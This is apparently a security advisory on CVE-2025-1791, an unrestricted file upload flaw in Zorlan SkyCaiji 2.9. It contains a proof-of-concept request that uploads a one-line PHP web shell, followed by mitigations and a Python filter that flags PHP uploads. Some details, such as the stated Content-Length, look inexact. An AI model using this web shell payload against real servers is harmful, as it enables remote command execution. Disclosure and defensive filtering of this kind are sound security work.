A critical vulnerability has been identified in Zorlan SkyCaiji 2.9, a popular web crawling and data extraction tool. The vulnerability, designated as CVE-2025-1791, affects the fileAction function of the vendor/skycaiji/app/admin/controller/Tool.php file. An attacker can exploit this vulnerability by manipulating the save_data argument, leading to unrestricted file uploads. As a result, this could allow the attacker to execute malicious code on the affected system or exfiltrate sensitive data. The attack can be launched remotely, and the exploit details have been released to the public, making the vulnerability even more dangerous and urgent to address.

Exploit Details

The vulnerability is present in the fileAction() function of the vendor/skycaiji/app/admin/controller/Tool.php file. Below is an excerpt of the vulnerable code:

public function fileAction(){
  $op=input('op');
  // Only 'path' is passed through a filter (CheckInput::escape_dir).
  $path=input('path','','\skycaiji\admin\model\CheckInput::escape_dir');
  $ext='';
  if(preg_match('/^[a-z]/i', $ext)){
    $ext='';
  }

  // Request-controlled values, read with no filter applied.
  $saveData=input('save_data','');
  $fileName=input('name');
  $fileExt=input('ext');
  $fileContent=input('content');
  // ...
}

An attacker can manipulate the save_data argument to upload a file with malicious content and execute it. Since there is no proper filtering mechanism for the content of the uploaded file, the attacker has full control over what code gets executed, making it a highly critical vulnerability.

The following is a PoC (Proof of Concept) for the exploit:

POST /vendor/skycaiji/app/admin/controller/Tool.php HTTP/1.1
Host: TARGET-HOST
Content-Type: multipart/form-data;boundary=---------------------------140378292840
Content-Length: 118

-----------------------------140378292840
Content-Disposition: form-data; name="save_data"; filename="malicious_payload.php"
Content-Type: text/php

<?php system($_GET['cmd']); ?>
-----------------------------140378292840--

Using this PoC, an attacker can upload a file named "malicious_payload.php" containing PHP code to execute arbitrary commands on the affected system.

Mitigation

As of now, there hasn't been an official patch released for this vulnerability, but there are some temporary mitigations that can be implemented:

1. Disable the web application's file upload functionality, if not required.
2. Implement strict access controls to restrict access to the affected vendor/skycaiji/app/admin/controller/Tool.php file.
3. Deploy a Web Application Firewall (WAF) with rules to detect and block attempts to exploit this vulnerability.
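
An added example, not code from SkyCaiji or from this advisory: the kind of inspection a WAF rule or reverse-proxy hook for mitigation 3 could apply to multipart request bodies, flagging any part whose filename carries an executable extension or whose content contains a PHP open tag. The function names, the extension list and the sample requests are assumptions constructed for illustration.

```python
import re
from email import message_from_bytes, policy

# Extensions a PHP-enabled server may pass to the interpreter (assumed list),
# including double extensions such as "x.php.jpg".
EXEC_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|\s*$)", re.I)
# PHP open tags anywhere in the uploaded bytes.
CODE_TAG = re.compile(rb"<\?(php|=)", re.I)

def inspect_upload(content_type: str, body: bytes) -> list:
    """Return reasons to block a multipart/form-data request ([] = allow)."""
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    msg = message_from_bytes(raw, policy=policy.HTTP)
    if not msg.is_multipart():
        return ["malformed multipart body"]  # fail closed on unparseable input
    reasons = []
    for part in msg.iter_parts():
        field = part.get_param("name", header="content-disposition") or "?"
        filename = part.get_filename()
        data = part.get_payload(decode=True) or b""
        if filename and EXEC_EXT.search(filename):
            reasons.append(f"{field}: executable extension in {filename!r}")
        if CODE_TAG.search(data):
            reasons.append(f"{field}: PHP open tag in content")
    return reasons

# Constructed samples, not captured traffic; the PHP body is a harmless marker.
BOUNDARY = b"constructed7d1"
SAMPLE_CT = "multipart/form-data; boundary=" + BOUNDARY.decode()

def build_form(filename: bytes, ctype: bytes, data: bytes) -> bytes:
    """Build a one-part form body that uses the save_data field name."""
    return (b"--" + BOUNDARY + b"\r\n"
            b'Content-Disposition: form-data; name="save_data"; filename="'
            + filename + b'"\r\n'
            b"Content-Type: " + ctype + b"\r\n\r\n" + data + b"\r\n"
            b"--" + BOUNDARY + b"--\r\n")

if __name__ == "__main__":
    flagged = build_form(b"note.php", b"text/php", b"<?php echo 'marker'; ?>")
    clean = build_form(b"rules.txt", b"text/plain", b"title,url")
    for label, body in (("flagged", flagged), ("clean", clean)):
        print(label, inspect_upload(SAMPLE_CT, body))
```

Filtering of this kind reduces exposure but does not replace restricting access to the admin controller or applying a vendor fix once one exists.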

Conclusion

The critical unrestricted file upload vulnerability in Zorlan SkyCaiji 2.9, identified as CVE-2025-1791, allows remote attackers to execute malicious code on the affected system. With details of the vulnerability already disclosed to the public, it becomes imperative for users and administrators of this web application to apply the recommended mitigation measures as soon as possible, and watch out for an official patch release from the developers of Zorlan SkyCaiji.

Timeline

Published on: 03/01/2025 14:15:34 UTC
Last modified on: 03/03/2025 21:15:16 UTC